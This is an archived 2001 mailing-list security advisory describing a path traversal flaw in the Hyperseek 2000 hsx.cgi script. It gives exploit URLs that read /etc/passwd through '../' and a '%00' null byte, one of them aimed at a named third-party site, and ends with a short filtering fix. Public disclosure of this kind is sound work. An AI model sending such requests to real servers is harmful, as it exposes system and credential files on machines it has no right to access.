OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: MC GaN (vipersvMAIL.RU)
Date: Sun Jan 28 2001 - 01:28:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                  --== NerF security gr0up advisory ==--
    --------------------------------------------------------------------
    Hyperseek 2000 Search Engine - "show directory & files" bug.
    --------------------------------------------------------------------

    1. Standart perl problem is in statistic module - file: hsx.cgi, script does not filter ../ and %00. Through this bug, you can remotely read any file and make listing of directory. ../ - directory up, %00 hex symbol, that means end of line.

    2. Exploit url:
    http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
    Note: directory can change and amount of ../ can vary.

    3. Example:
    http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

    4. Filter symbols like:
    $dat=~ s/\0//g;

    --------------------------------------------------------------------
    NerF security gr0up (Russia) - www.nerf.f2s.com